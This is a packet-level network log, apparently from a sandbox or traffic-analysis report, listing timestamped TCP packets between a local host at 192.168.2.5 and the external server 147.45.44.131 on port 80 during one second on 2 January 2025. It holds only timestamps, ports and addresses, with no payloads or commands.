Jan 2, 2025 19:14:15.376636982 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376655102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376693964 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376698971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376708984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376719952 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376729012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376759052 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376792908 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376800060 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376811028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376821041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376827002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376831055 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376837969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376883030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376912117 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376955032 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376971960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376983881 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376993895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377005100 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377015114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377026081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377029896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377073050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377084970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377095938 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377109051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377130985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377141953 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377156019 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377156019 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377160072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377176046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377191067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377204895 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377222061 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377389908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377405882 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377415895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377427101 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377474070 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377485991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377499104 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377511024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377518892 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377525091 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377537012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377543926 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377547979 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377569914 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377578020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377588987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377599001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377636909 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377636909 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377736092 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377741098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377752066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377762079 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377772093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377788067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377799034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377809048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377815962 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377825975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377835989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377846003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377867937 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377928019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377939939 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377948999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377959013 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377959013 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377973080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377978086 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.377985001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.377995014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.378005028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.378025055 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.378070116 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.423137903 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.423154116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.423199892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.423213005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.423224926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.423237085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.423248053 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.423285961 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.423369884 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.460223913 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.460302114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.460315943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.460330963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.460341930 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.460351944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.460362911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.460396051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.460571051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461205959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461230993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461237907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461244106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461253881 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461282969 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461316109 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461327076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461337090 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461374044 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461390018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461390018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461484909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461500883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461512089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461553097 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461571932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461584091 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461599112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461601973 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461615086 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461637020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461637974 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461648941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461659908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461663961 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461673975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461685896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461693048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461704016 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461704969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461719036 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461729050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.461751938 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.461859941 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.462605000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462642908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462655067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462708950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462718964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462730885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462742090 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462748051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.462753057 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462789059 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.462815046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462852955 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.462899923 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462909937 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462925911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462934017 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.462938070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462969065 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.462980986 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.462994099 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463000059 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463006973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463016987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463079929 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463093996 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463145971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463176012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463185072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463196993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463208914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463224888 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463227987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463275909 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463301897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463319063 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463330030 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463341951 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463346958 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463351965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463370085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463385105 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463395119 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463419914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463418961 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463421106 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463421106 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463432074 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463459969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463460922 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463471889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463483095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463493109 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463500023 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463511944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463522911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463542938 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463565111 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463577986 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463610888 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463648081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463660002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463669062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463697910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463709116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463718891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463728905 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463771105 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463771105 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463771105 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463776112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463804960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463812113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463843107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463850021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463893890 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463905096 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463915110 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463922024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463933945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463946104 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463953018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.463957071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.463998079 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464030027 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464194059 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464270115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464284897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464289904 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464299917 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464315891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464327097 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464356899 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464416981 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464428902 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464447021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464458942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464469910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464479923 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464481115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464493036 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464503050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464512110 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464513063 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464524984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464539051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464589119 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464687109 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464699030 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464716911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464729071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464730024 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464740038 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464754105 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464761019 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464775085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464777946 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464782953 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464787960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464788914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464798927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464838028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464840889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.464859962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.464916945 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.465142965 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.509922028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.509942055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.509952068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.509970903 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.509982109 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.509994030 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.510006905 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.510016918 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.510019064 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.510042906 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.510188103 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.547158957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.547198057 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.547211885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.547257900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.547261000 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.547272921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.547281027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.547282934 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.547285080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.547421932 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.548126936 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548190117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548202038 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548218966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548229933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548247099 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548257113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548269033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548280001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548325062 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.548346043 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548387051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.548393965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548407078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548429012 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.548475981 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.548506021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548517942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548536062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548542023 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548552990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548563004 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.548571110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548582077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548593044 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548605919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548614025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.548619032 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.548619032 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.548698902 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.548698902 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.549361944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549379110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549391031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549432993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549448013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549459934 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549469948 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.549474955 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549490929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549510956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.549529076 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.549649954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549669981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549685955 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.549695015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549705982 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549768925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549779892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549794912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549804926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549809933 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.549861908 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.549861908 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.549881935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549894094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549904108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549916029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549926043 CET	80	49721	147.45.44.131	192.168.2.5
